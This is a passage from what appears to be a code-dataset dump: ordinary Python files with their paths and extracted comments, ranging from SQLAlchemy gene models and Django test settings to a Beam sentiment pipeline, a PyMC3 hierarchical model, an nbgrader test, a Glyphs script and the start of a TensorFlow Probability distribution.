The time step corresponding to the given time.
Notes
-----
This function cannot handle infinity values, use big values instead (e.g.
a `NeuronGroup` will use ``-1e4*second`` as the value of the ``lastspike``
variable for neurons that never spiked).
@check_units sets _arg_units to None if the units aren't specified for all of its arguments @check_units sets _return_unit to None if no "result=..." keyword is specified.: Stores implementations for this function in a: `FunctionImplementationContainer` in some cases we do the code generation with original_generator_class instead (e.g. GSL) Give a nicer error message if possible Get the original function inside the check_units decorator strip away units in the function by changing its namespace Allow nesting of decorators Add a numpy implementation that discards units copy any annotation attributes if hasattr(func, '_annotation_attributes'): for attrname in func._annotation_attributes: setattr(function, attrname, getattr(func, attrname)) function._annotation_attributes = getattr(func, '_annotation_attributes', []) Standard functions and constants maximum 32bit integer divided by 2 numpy functions that have the same name in numpy and math.h numpy functions that have a different name in numpy and math.h functions that need special treatment | 12,070 | en | 0.709796 |
# -*- coding: utf-8 -*-
"""SQLAlchemy models for Bio2BEL HGNC."""
from __future__ import annotations
from sqlalchemy import Column, ForeignKey, Integer, String, Table
from sqlalchemy.ext.declarative import DeclarativeMeta, declarative_base
from sqlalchemy.orm import relationship
from bio2bel.compath import CompathPathwayMixin, CompathProteinMixin
from .constants import MODULE_NAME
__all__ = [
'Base',
'GeneFamily',
'HumanGene',
'MouseGene',
'RatGene',
'human_mouse',
'human_rat',
]
HUMAN_GENE_TABLE_NAME = f'{MODULE_NAME}_humanGene'
HUMAN_RAT_TABLE_NAME = f'{MODULE_NAME}_humanGene_ratGene'
RAT_GENE_TABLE_NAME = f'{MODULE_NAME}_ratGene'
HUMAN_MOUSE_TABLE_NAME = f'{MODULE_NAME}_humanGene_mouseGene'
MOUSE_GENE_TABLE_NAME = f'{MODULE_NAME}_mouseGene'
GENE_FAMILY_TABLE_NAME = f'{MODULE_NAME}_geneFamily'
GENE_TO_FAMILY_TABLE_NAME = f'{MODULE_NAME}_humanGene_geneFamily'
Base: DeclarativeMeta = declarative_base()
human_mouse = Table(
HUMAN_MOUSE_TABLE_NAME,
Base.metadata,
Column('human_gene_id', Integer, ForeignKey(f'{HUMAN_GENE_TABLE_NAME}.id'), primary_key=True),
Column('mouse_gene_id', Integer, ForeignKey(f'{MOUSE_GENE_TABLE_NAME}.id'), primary_key=True),
)
human_rat = Table(
HUMAN_RAT_TABLE_NAME,
Base.metadata,
Column('human_gene_id', Integer, ForeignKey(f'{HUMAN_GENE_TABLE_NAME}.id'), primary_key=True),
Column('rat_gene_id', Integer, ForeignKey(f'{RAT_GENE_TABLE_NAME}.id'), primary_key=True),
)
human_family = Table(
GENE_TO_FAMILY_TABLE_NAME,
Base.metadata,
Column('human_gene_id', Integer, ForeignKey(f'{HUMAN_GENE_TABLE_NAME}.id'), primary_key=True),
Column('gene_family_id', Integer, ForeignKey(f'{GENE_FAMILY_TABLE_NAME}.id'), primary_key=True),
)
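# Added note: human_mouse, human_rat and human_family above are plain association
# tables; each holds only the two foreign-key columns needed for the respective
# many-to-many link and is attached to the models below via relationship(..., secondary=...).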
class HumanGene(Base, CompathProteinMixin):
"""A SQLAlchemy model for a human gene."""
__tablename__ = HUMAN_GENE_TABLE_NAME
id = Column(Integer, primary_key=True)
entrez_id = Column(String(255), doc='entrez id of the protein')
hgnc_id = Column(String(255), doc='HGNC id of the protein')
    hgnc_symbol = Column(String(255), doc='HGNC symbol of the protein')
class MouseGene(Base):
"""A SQLAlchemy model for a mouse gene."""
__tablename__ = MOUSE_GENE_TABLE_NAME
id = Column(Integer, primary_key=True)
entrez_id = Column(String(255), doc='entrez id of the protein')
mgi_id = Column(String(255), doc='MGI id of the protein')
mgi_symbol = Column(String(255), doc='MGI symbol of the protein')
human_genes = relationship(
HumanGene,
secondary=human_mouse,
backref='mouse_genes',
)
class RatGene(Base):
"""A SQLAlchemy model for an rat gene."""
__tablename__ = RAT_GENE_TABLE_NAME
id = Column(Integer, primary_key=True)
entrez_id = Column(String(255), doc='entrez id of the protein')
rgd_id = Column(String(255), doc='RGD id of the protein')
rgd_symbol = Column(String(255), doc='RGD symbol of the protein')
human_genes = relationship(
HumanGene,
secondary=human_rat,
backref='rat_genes',
)
class GeneFamily(CompathPathwayMixin, Base):
"""A SQLAlchemy model for an HGNC Gene family."""
__tablename__ = GENE_FAMILY_TABLE_NAME
id = Column(Integer, primary_key=True)
identifier = Column(String(255), doc='HGNC gene family id of the protein')
symbol = Column(String(255), doc='HGNC gene family symbol of the protein')
name = Column(String(255), doc='HGNC gene family name of the protein')
proteins = relationship(
HumanGene,
secondary=human_family,
backref='gene_families',
)
| src/bio2bel_hgnc/models.py | 3,634 | A SQLAlchemy model for an HGNC Gene family.
A SQLAlchemy model for a human gene.
A SQLAlchemy model for a mouse gene.
A SQLAlchemy model for an rat gene.
SQLAlchemy models for Bio2BEL HGNC.
-*- coding: utf-8 -*- | 213 | en | 0.723093 |
"""
With these settings, tests run faster.
"""
from .base import * # noqa
from .base import env
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = env(
"DJANGO_SECRET_KEY",
default="Zr7lk4kl3mUPXfmrsWWDcfVMuZW6PPy2fULMUv7yTwy4agkNObBGiyyGVahi78ed",
)
# https://docs.djangoproject.com/en/dev/ref/settings/#test-runner
TEST_RUNNER = "django.test.runner.DiscoverRunner"
# CACHES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#caches
CACHES = {
"default": {
"BACKEND": "django.core.cache.backends.locmem.LocMemCache",
"LOCATION": "",
}
}
# PASSWORDS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#password-hashers
PASSWORD_HASHERS = ["django.contrib.auth.hashers.MD5PasswordHasher"]
# TEMPLATES
# ------------------------------------------------------------------------------
TEMPLATES[0]["OPTIONS"]["loaders"] = [ # noqa F405
(
"django.template.loaders.cached.Loader",
[
"django.template.loaders.filesystem.Loader",
"django.template.loaders.app_directories.Loader",
],
)
]
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = "django.core.mail.backends.locmem.EmailBackend"
# Your stuff...
# ------------------------------------------------------------------------------
| config/settings/test.py | 1,679 | With these settings, tests run faster.
noqa GENERAL ------------------------------------------------------------------------------ https://docs.djangoproject.com/en/dev/ref/settings/secret-key https://docs.djangoproject.com/en/dev/ref/settings/test-runner CACHES ------------------------------------------------------------------------------ https://docs.djangoproject.com/en/dev/ref/settings/caches PASSWORDS ------------------------------------------------------------------------------ https://docs.djangoproject.com/en/dev/ref/settings/password-hashers TEMPLATES ------------------------------------------------------------------------------ noqa F405 EMAIL ------------------------------------------------------------------------------ https://docs.djangoproject.com/en/dev/ref/settings/email-backend Your stuff... ------------------------------------------------------------------------------ | 900 | en | 0.371199 |
#!/usr/bin/env python
import sys, os
import itertools, operator
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
def reader(myfile):
t = np.array([])
print(myfile)
with open(myfile) as f:
lines = f.readlines()
for line in lines:
parts = line.split(" ")
if(len(parts)>1):
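                # field 7 (0-based) of each whitespace-separated line is read as
                # the throughput sample that gets plotted later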
t=np.append(t,float(parts[7]))
f.close()
return t
def tuples_by_dispatch_width(tuples):
ret = []
tuples_sorted = sorted(tuples, key=operator.itemgetter(0))
for key,group in itertools.groupby(tuples_sorted,operator.itemgetter(0)):
        ret.append((key, list(zip(*[x[1:] for x in group]))))
return ret
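# Added note: given (config, n_threads, throughput) tuples, the function above
# groups them by config and returns (config, (threads_axis, throughput_axis))
# pairs, which printgraphs() below iterates over to draw one line per config.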
def printgraphs(results_tuples,filename,title):
global_ws = [1,2,4,8,16,32,64]
plt.clf()
plt.cla()
markers = ['.', 'o', 'v', '*', 'D']
fig = plt.figure()
plt.grid(True)
plt.title(title)
ax = plt.subplot(111)
ax.set_xlabel("$Threads$")
ax.set_ylabel("$Throughput(Mops/sec)$")
i = 0
c="b"
tuples_by_dw = tuples_by_dispatch_width(results_tuples)
    for dw_tuple in tuples_by_dw:
        dw = dw_tuple[0]
        ws_axis = dw_tuple[1][0]
        ipc_axis = dw_tuple[1][1]
x_ticks = np.arange(0, len(global_ws))
        x_labels = [str(w) for w in global_ws]
ax.xaxis.set_ticks(x_ticks)
ax.xaxis.set_ticklabels(x_labels)
#ax.yaxis.set_ticks(np.arange(0,210,10))
        print(x_ticks)
        print(ipc_axis)
if(i==1): c="r"
ax.plot(x_ticks, ipc_axis, label="Configuration "+str(dw), marker=markers[i%len(markers)],color=c)
i = i + 1
lgd = ax.legend(ncol=len(tuples_by_dw), bbox_to_anchor=(0.75, -0.15), prop={'size':8})
plt.savefig(filename, bbox_extra_artists=(lgd,), bbox_inches='tight')
def lastplotter(t1,t2):
results_tuples = []
results_tuples.append((1,1,t1[0]))
results_tuples.append((1,2,t1[1]))
results_tuples.append((1,4,t1[2]))
results_tuples.append((1,8,t1[3]))
results_tuples.append((1,16,t1[4]))
results_tuples.append((1,32,t1[5]))
results_tuples.append((1,64,t1[6]))
results_tuples.append((2,1,t2[0]))
results_tuples.append((2,2,t2[1]))
results_tuples.append((2,4,t2[2]))
results_tuples.append((2,8,t2[3]))
results_tuples.append((2,16,t2[4]))
results_tuples.append((2,32,t2[5]))
results_tuples.append((2,64,t2[6]))
return results_tuples
t1 = reader('part11')
t2 = reader('part12')
t3 = reader('part21')
t4 = reader('part22')
print("Done reading files,now let's plot em!")
#print(t1,t2)
# uncomment in order to print line plots
res1 = lastplotter(t1,t2)
printgraphs(res1,'naive_bank.png','Bank accounts 1')
res2 = lastplotter(t3,t4)
printgraphs(res2,'padded_bank.png','Bank accounts 2')
| ex3/z1/graph.py | 2,555 | !/usr/bin/env pythonax.yaxis.set_ticks(np.arange(0,210,10))print(t1,t2) uncomment in order to print line plots | 110 | en | 0.431387 |
# Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A streaming python pipeline to read in PubSub tweets and perform
classification using Prediction API"""
import argparse
import datetime
import json
import logging
import os
import socket
import apache_beam as beam
import apache_beam.transforms.window as window
from apache_beam.io.gcp.bigquery_tools import parse_table_schema_from_json
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.options.pipeline_options import GoogleCloudOptions
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.transforms.util import BatchElements
from google.api_core import retry
from google.api_core import exceptions
from google.cloud import language_v1
from google.cloud.language_v1 import enums
TIMEOUT_IN_SEC = 60 * 2 # 2 minutes timeout limit
socket.setdefaulttimeout(TIMEOUT_IN_SEC)
PROJECT_ID = os.getenv('PROJECT_ID')
def get_sentiment(instances_content):
"""Analyzing Sentiment in a String
Args:
text_content The text content to analyze
"""
scores = []
client = language_v1.LanguageServiceClient()
encoding_type = enums.EncodingType.UTF8
language = 'en'
type_ = enums.Document.Type.PLAIN_TEXT
for content in instances_content:
content = content.encode('utf-8') if isinstance(content,
unicode) else str(
content)
document = {'content': content, 'type': type_, 'language': language}
try:
response = client.analyze_sentiment(document,
encoding_type=encoding_type,
timeout=30,
retry=retry.Retry(deadline=60))
# Get overall sentiment of the input document
if response.document_sentiment.score:
scores.append(response.document_sentiment.score)
else:
scores.append(-1)
logging.error(
'Document sentiment score not found for {}'.format(content))
except exceptions.GoogleAPICallError as e:
logging.exception(e)
except exceptions.RetryError as e:
logging.exception(e)
except ValueError as e:
logging.exception(e)
return scores
def prediction_helper(messages):
"""Processes PubSub messages and calls AI Platform prediction.
:param messages:
:return:
"""
# Handle single string.
if not isinstance(messages, list):
messages = [messages]
# Messages from PubSub are JSON strings
instances = list(map(lambda message: json.loads(message), messages))
# Estimate the sentiment of the 'text' of each tweet
scores = get_sentiment(
[instance['text'] for instance in instances if instance.get('text')])
if len(scores) == len(instances):
for i, instance in enumerate(instances):
logging.info('Processed {} instances.'.format(len(instances)))
instance['sentiment'] = scores[i]
return instances
logging.error('Invalid scores {} instances {}'.format(len(scores),
len(instances)))
logging.error(instances)
return
class GroupWindowsIntoBatches(beam.PTransform):
"""A composite transform that groups Pub/Sub messages based on publish
time and outputs a list of dictionaries, where each contains one message
and its publish timestamp.
"""
def __init__(self, window_size):
# Convert minutes into seconds.
self.window_size = int(window_size * 60)
def expand(self, pcoll):
return (
pcoll
# Assigns window info to each Pub/Sub message based on its
# publish timestamp.
| "Window into Fixed Intervals"
>> beam.WindowInto(window.FixedWindows(self.window_size))
| "Add timestamps to messages" >> beam.ParDo(AddTimestamps())
# Use a dummy key to group the elements in the same window.
# Note that all the elements in one window must fit into memory
# for this. If the windowed elements do not fit into memory,
# please consider using `beam.util.BatchElements`.
# https://beam.apache.org/releases/pydoc/current/apache_beam.transforms.util.html#apache_beam.transforms.util.BatchElements
| "Add Dummy Key" >> beam.Map(lambda elem: (None, elem))
| "Groupby" >> beam.GroupByKey()
| "Abandon Dummy Key" >> beam.MapTuple(lambda _, val: val)
)
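# Added note: this composite transform (and AddTimestamps below) is defined here
# but not referenced by run(), which instead windows and batches the stream
# directly with beam.WindowInto and BatchElements.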
class AddTimestamps(beam.DoFn):
@staticmethod
def process(element, publish_time=beam.DoFn.TimestampParam):
"""Processes each incoming windowed element by extracting the Pub/Sub
message and its publish timestamp into a dictionary. `publish_time`
defaults to the publish timestamp returned by the Pub/Sub server. It
is bound to each element by Beam at runtime.
"""
yield {
"message_body": element.decode("utf-8"),
"publish_time": datetime.datetime.utcfromtimestamp(
float(publish_time)
).strftime("%Y-%m-%d %H:%M:%S.%f"),
}
def run(args, pipeline_args=None):
"""Executes Pipeline.
:param args:
:param pipeline_args:
:return:
"""
"""Build and run the pipeline."""
# We use the save_main_session option because one or more DoFn's in this
# workflow rely on global context (e.g., a module imported at module level).
pipeline_options = PipelineOptions(
pipeline_args, streaming=True, save_main_session=True
)
pipeline_options.view_as(StandardOptions).runner = args.runner
# Run on Cloud DataFlow by default
google_cloud_options = pipeline_options.view_as(GoogleCloudOptions)
google_cloud_options.project = PROJECT_ID
google_cloud_options.job_name = 'pubsub-api-bigquery'
google_cloud_options.staging_location = args.staging_location
google_cloud_options.temp_location = args.temp_location
google_cloud_options.region = args.region
p = beam.Pipeline(options=pipeline_options)
lines = p | 'read in tweets' >> beam.io.ReadFromPubSub(
topic=args.input_topic,
with_attributes=False,
id_label='tweet_id') # TODO: Change to PubSub id.
# Window them, and batch them into batches. (Not too large)
output_tweets = (lines | 'assign window key' >> beam.WindowInto(
window.FixedWindows(args.window_size))
| 'batch into n batches' >> BatchElements(
min_batch_size=args.min_batch_size,
max_batch_size=args.max_batch_size)
| 'predict sentiment' >> beam.FlatMap(
lambda messages: prediction_helper(messages))
)
# Make explicit BQ schema for output tables:
bq_schema_json = {"fields": [{"name": "id", "type": "STRING"},
{"name": "text", "type": "STRING"},
{"name": "user_id", "type": "STRING"},
{"name": "sentiment", "type": "FLOAT"},
{"name": "posted_at", "type": "TIMESTAMP"},
{"name": "favorite_count", "type": "INTEGER"},
{"name": "retweet_count", "type": "INTEGER"},
{"name": "media", "type": "STRING"},
]}
bq_schema = parse_table_schema_from_json(json.dumps(bq_schema_json))
# Write to BigQuery
output_tweets | 'store twitter posts' >> beam.io.WriteToBigQuery(
table=args.bigquery_table,
dataset=args.bigquery_dataset,
schema=bq_schema,
write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND,
create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,
project=PROJECT_ID
)
result = p.run()
result.wait_until_finish()
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument(
'--input-topic',
help='The Cloud Pub/Sub topic to read from.\n'
'projects/<PROJECT_NAME>/topics/<TOPIC_NAME>',
required=True
)
parser.add_argument(
'--region',
help='The DataFlow region',
default='us-central1'
)
parser.add_argument(
'--staging-location',
help='The DataFlow staging location',
default='gs://<bucket_name>/staging/',
required=True
)
parser.add_argument(
'--temp-location',
help='The DataFlow temp location',
default='gs://<bucket_name>/tmp/',
required=True
)
parser.add_argument(
'--bigquery-dataset',
help='BigQuery dataset',
required=True
)
parser.add_argument(
'--bigquery-table',
help='BigQuery OutPut table',
required=True
)
parser.add_argument(
'--window-size',
type=int,
default=60,
help="Output file's window size in number of seconds",
)
parser.add_argument(
'--min-batch-size',
type=int,
default=1,
help='Min batch size for Windowing',
)
parser.add_argument(
'--max-batch-size',
type=int,
default=100,
        help='Max batch size for Windowing',
)
parser.add_argument(
'--runner',
type=str,
default='DataflowRunner',
help='DataFlow running mode',
)
known_args, pipeline_args = parser.parse_known_args()
run(
known_args,
pipeline_args
)
| notebooks/samples/tensorflow/sentiment_analysis/dataflow/PubSubToBigQueryWithAPI.py | 10,311 | A composite transform that groups Pub/Sub messages based on publish
time and outputs a list of dictionaries, where each contains one message
and its publish timestamp.
Analyzing Sentiment in a String
Args:
text_content The text content to analyze
Processes PubSub messages and calls AI Platform prediction.
:param messages:
:return:
Processes each incoming windowed element by extracting the Pub/Sub
message and its publish timestamp into a dictionary. `publish_time`
defaults to the publish timestamp returned by the Pub/Sub server. It
is bound to each element by Beam at runtime.
Executes Pipeline.
:param args:
:param pipeline_args:
:return:
A streaming python pipeline to read in PubSub tweets and perform
classification using Prediction API
Copyright 2020 Google LLC. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 2 minutes timeout limit Get overall sentiment of the input document Handle single string. Messages from PubSub are JSON strings Estimate the sentiment of the 'text' of each tweet Convert minutes into seconds. Assigns window info to each Pub/Sub message based on its publish timestamp. Use a dummy key to group the elements in the same window. Note that all the elements in one window must fit into memory for this. If the windowed elements do not fit into memory, please consider using `beam.util.BatchElements`. https://beam.apache.org/releases/pydoc/current/apache_beam.transforms.util.htmlapache_beam.transforms.util.BatchElements We use the save_main_session option because one or more DoFn's in this workflow rely on global context (e.g., a module imported at module level). Run on Cloud DataFlow by default TODO: Change to PubSub id. Window them, and batch them into batches. (Not too large) Make explicit BQ schema for output tables: Write to BigQuery | 2,264 | en | 0.820158 |
#https://docs.pymc.io/notebooks/GLM-hierarchical-binominal-model.html
import matplotlib.pyplot as plt
import scipy.stats as stats
import numpy as np
import pandas as pd
#import seaborn as sns
import pymc3 as pm
import arviz as az
import theano.tensor as tt
np.random.seed(123)
# rat data (BDA3, p. 102)
y = np.array([
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1,
1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 5, 2,
5, 3, 2, 7, 7, 3, 3, 2, 9, 10, 4, 4, 4, 4, 4, 4, 4,
10, 4, 4, 4, 5, 11, 12, 5, 5, 6, 5, 6, 6, 6, 6, 16, 15,
15, 9, 4
])
n = np.array([
20, 20, 20, 20, 20, 20, 20, 19, 19, 19, 19, 18, 18, 17, 20, 20, 20,
20, 19, 19, 18, 18, 25, 24, 23, 20, 20, 20, 20, 20, 20, 10, 49, 19,
46, 27, 17, 49, 47, 20, 20, 13, 48, 50, 20, 20, 20, 20, 20, 20, 20,
48, 19, 19, 19, 22, 46, 49, 20, 20, 23, 19, 22, 20, 20, 20, 52, 46,
47, 24, 14
])
N = len(n)
def logp_ab(value):
    '''Unnormalised log prior density: log p(a, b) = -2.5 * log(a + b).'''
return tt.log(tt.pow(tt.sum(value), -5/2))
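# Added note: logp_ab is the improper hyperprior p(alpha, beta) proportional to
# (alpha + beta)**(-5/2) used for the rat-tumour example in Gelman et al. (BDA3);
# pm.Potential below adds this log-density term to the joint model.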
with pm.Model() as model:
# Uninformative prior for alpha and beta
ab = pm.HalfFlat('ab',
shape=2,
testval=np.asarray([1., 1.]))
pm.Potential('p(a, b)', logp_ab(ab))
alpha = pm.Deterministic('alpha', ab[0])
beta = pm.Deterministic('beta', ab[1])
X = pm.Deterministic('X', tt.log(ab[0]/ab[1]))
Z = pm.Deterministic('Z', tt.log(tt.sum(ab)))
theta = pm.Beta('theta', alpha=ab[0], beta=ab[1], shape=N)
p = pm.Binomial('y', p=theta, observed=y, n=n)
#trace = pm.sample(1000, tune=2000, target_accept=0.95)
trace = pm.sample(1000, tune=500, cores=1)
#az.plot_trace(trace)
#plt.savefig('../figures/hbayes_binom_rats_trace.png', dpi=300)
print(az.summary(trace))
J = len(n)
post_mean = np.zeros(J)
samples = trace[theta]
post_mean = np.mean(samples, axis=0)
print('post mean')
print(post_mean)
alphas = trace['alpha']
betas = trace['beta']
alpha_mean = np.mean(alphas)
beta_mean = np.mean(betas)
hyper_mean = alpha_mean/(alpha_mean + beta_mean)
print('hyper mean')
print(hyper_mean)
mle = y / n
pooled_mle = np.sum(y) / np.sum(n)
print('pooled mle')
print(pooled_mle)
axes = az.plot_forest(
trace, var_names='theta', credible_interval=0.95, combined=True, colors='cycle')
y_lims = axes[0].get_ylim()
axes[0].vlines(hyper_mean, *y_lims)
plt.savefig('../figures/hbayes_binom_rats_forest95.pdf', dpi=300)
J = len(n)
fig, axs = plt.subplots(4,1, figsize=(10,10))
plt.subplots_adjust(hspace=0.3)
axs = np.reshape(axs, 4)
xs = np.arange(J)
ax = axs[0]
ax.bar(xs, y)
ax.set_title('number of postives')
ax = axs[1]
ax.bar(xs, n)
ax.set_title('popn size')
ax = axs[2]
ax.bar(xs, mle)
ax.set_ylim(0, 0.5)
ax.hlines(pooled_mle, 0, J, 'r', lw=3)
ax.set_title('MLE (red line = pooled)')
ax = axs[3]
ax.bar(xs, post_mean)
ax.hlines(hyper_mean, 0, J, 'r', lw=3)
ax.set_ylim(0, 0.5)
ax.set_title('posterior mean (red line = hparam)')
plt.savefig('../figures/hbayes_binom_rats_barplot.pdf', dpi=300)
J = len(n)
xs = np.arange(J)
fig, ax = plt.subplots(1,1)
ax.bar(xs, y)
ax.set_title('number of postives')
plt.savefig('../figures/hbayes_binom_rats_outcomes.pdf', dpi=300)
fig, ax = plt.subplots(1,1)
ax.bar(xs, n)
ax.set_title('popn size')
plt.savefig('../figures/hbayes_binom_rats_popsize.pdf', dpi=300)
fig, ax = plt.subplots(1,1)
ax.bar(xs, mle)
ax.set_ylim(0, 0.5)
ax.hlines(pooled_mle, 0, J, 'r', lw=3)
ax.set_title('MLE (red line = pooled)')
plt.savefig('../figures/hbayes_binom_rats_MLE.pdf', dpi=300)
fig, ax = plt.subplots(1,1)
ax.bar(xs, post_mean)
ax.hlines(hyper_mean, 0, J, 'r', lw=3)
ax.set_ylim(0, 0.5)
ax.set_title('posterior mean (red line = hparam)')
plt.savefig('../figures/hbayes_binom_rats_postmean.pdf', dpi=300)
| scripts/hbayes_binom_rats_pymc3.py | 3,785 | prior density
https://docs.pymc.io/notebooks/GLM-hierarchical-binominal-model.htmlimport seaborn as sns rat data (BDA3, p. 102) Uninformative prior for alpha and betatrace = pm.sample(1000, tune=2000, target_accept=0.95)az.plot_trace(trace)plt.savefig('../figures/hbayes_binom_rats_trace.png', dpi=300) | 303 | en | 0.394721 |
import os
from os.path import join
from ...utils import remove
from .. import run_nbgrader
from .base import BaseTestApp
class TestNbGraderExport(BaseTestApp):
def test_help(self):
"""Does the help display without error?"""
run_nbgrader(["export", "--help-all"])
def test_export(self, db, course_dir):
with open("nbgrader_config.py", "a") as fh:
fh.write("""c.CourseDirectory.db_assignments = [
dict(name='ps1', duedate='2015-02-02 14:58:23.948203 PST'),
dict(name='ps2', duedate='2015-02-02 14:58:23.948203 PST')]\n""")
fh.write("""c.CourseDirectory.db_students = [dict(id="foo"), dict(id="bar")]""")
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps2", "p1.ipynb"))
run_nbgrader(["assign", "ps1", "--db", db])
run_nbgrader(["assign", "ps2", "--db", db])
self._copy_file(join("files", "submitted-changed.ipynb"), join(course_dir, "submitted", "bar", "ps1", "p1.ipynb"))
self._copy_file(join("files", "submitted-changed.ipynb"), join(course_dir, "submitted", "foo", "ps2", "p1.ipynb"))
run_nbgrader(["autograde", "ps1", "--db", db])
run_nbgrader(["autograde", "ps2", "--db", db])
run_nbgrader(["export", "--db", db])
assert os.path.isfile("grades.csv")
with open("grades.csv", "r") as fh:
contents = fh.readlines()
assert len(contents) == 5
run_nbgrader(["export", "--db", db, "--to", "mygrades.csv"])
assert os.path.isfile("mygrades.csv")
remove("grades.csv")
run_nbgrader(["export", "--db", db, "--exporter", "nbgrader.plugins.CsvExportPlugin"])
assert os.path.isfile("grades.csv")
run_nbgrader(["export", "--db", db, "--exporter=nbgrader.tests.apps.files.myexporter.MyExporter", "--to", "foo.txt"])
assert os.path.isfile("foo.txt")
| nbgrader/tests/apps/test_nbgrader_export.py | 2,046 | Does the help display without error? | 36 | en | 0.746264 |
#MenuTitle: Set Transform Origin
# -*- coding: utf-8 -*-
__doc__="""
Sets origin point for Rotate tool.
"""
import vanilla
class SetTransformOriginWindow( object ):
def __init__( self ):
# Window 'self.w':
windowWidth = 370
windowHeight = 60
windowWidthResize = 0 # user can resize width by this value
windowHeightResize = 0 # user can resize height by this value
self.w = vanilla.FloatingWindow(
( windowWidth, windowHeight ), # default window size
"Set Transform Origin", # window title
minSize = ( windowWidth, windowHeight ), # minimum size (for resizing)
maxSize = ( windowWidth + windowWidthResize, windowHeight + windowHeightResize ), # maximum size (for resizing)
autosaveName = "com.mekkablue.SetTransformOriginWindow.mainwindow" # stores last window position and size
)
# UI elements:
self.w.text_1 = vanilla.TextBox( (15-1, 12+3, 75, 14), "Origin:", sizeStyle='small' )
self.w.originX = vanilla.EditText( (65, 12, 70, 15+3), "0.0", sizeStyle = 'small')
self.w.originY = vanilla.EditText( (65+80, 12, 70, 15+3), "0.0", sizeStyle = 'small')
# Run Button:
self.w.resetButton = vanilla.Button((65+160, 12+1, 60, 15), "Get", sizeStyle='small', callback=self.GetTransformOrigin )
self.w.runButton = vanilla.Button((65+160+70, 12+1, 60, 15), "Set", sizeStyle='small', callback=self.SetTransformOriginMain )
self.w.setDefaultButton( self.w.runButton )
# Load Settings:
if not self.GetTransformOrigin(None):
print "Note: 'Set Transform Origin' could not load preferences. Will resort to defaults"
# Open window and focus on it:
self.w.open()
self.w.makeKey()
def GetTransformOrigin( self, sender ):
try:
myController = Glyphs.currentDocument.windowController()
rotateToolClass = NSClassFromString("GlyphsToolRotate")
myRotateTool = myController.toolForClass_( rotateToolClass )
currentOrigin = myRotateTool.transformOrigin()
self.w.originX.set( str(currentOrigin.x) )
self.w.originY.set( str(currentOrigin.y) )
except:
return False
return True
def SetTransformOriginMain( self, sender ):
try:
newOriginX = float(self.w.originX.get())
newOriginY = float(self.w.originY.get())
newOriginPoint = NSPoint( newOriginX, newOriginY )
myController = Glyphs.currentDocument.windowController()
myController.graphicView().setNeedsDisplay_(False)
rotateToolClass = NSClassFromString("GlyphsToolRotate")
myRotateTool = myController.toolForClass_( rotateToolClass )
myRotateTool.setTransformOrigin_( newOriginPoint )
myController.graphicView().setNeedsDisplay_(True)
except Exception, e:
# brings macro window to front and reports error:
Glyphs.showMacroWindow()
print "Set Transform Origin Error: %s" % e
SetTransformOriginWindow() | Paths/Set Transform Origin.py | 2,790 | MenuTitle: Set Transform Origin -*- coding: utf-8 -*- Window 'self.w': user can resize width by this value user can resize height by this value default window size window title minimum size (for resizing) maximum size (for resizing) stores last window position and size UI elements: Run Button: Load Settings: Open window and focus on it: brings macro window to front and reports error: | 386 | en | 0.77844 |
# Copyright 2020 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""The Truncated Cauchy distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
# Dependency imports
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.bijectors import sigmoid as sigmoid_bijector
from tensorflow_probability.python.bijectors import softplus as softplus_bijector
from tensorflow_probability.python.distributions import distribution
from tensorflow_probability.python.internal import assert_util
from tensorflow_probability.python.internal import dtype_util
from tensorflow_probability.python.internal import parameter_properties
from tensorflow_probability.python.internal import prefer_static as ps
from tensorflow_probability.python.internal import reparameterization
from tensorflow_probability.python.internal import samplers
from tensorflow_probability.python.internal import tensor_util
from tensorflow_probability.python.math import numeric
from tensorflow_probability.python.math import special as tfp_math
__all__ = [
'TruncatedCauchy',
]
def _cauchy_cdf_diff(x, y):
return tfp_math.atan_difference(x, y) / np.pi
class TruncatedCauchy(distribution.Distribution):
"""The Truncated Cauchy distribution.
The truncated Cauchy is a Cauchy distribution bounded between `low`
and `high` (the pdf is 0 outside these bounds and renormalized).
Samples from this distribution are differentiable with respect to `loc`
and `scale`, but not with respect to the bounds `low` and `high`.
### Mathematical Details
The probability density function (pdf) of this distribution is:
```none
pdf(x; loc, scale, low, high) =
{ 1 / (pi * scale * (1 + z**2) * A) for low <= x <= high
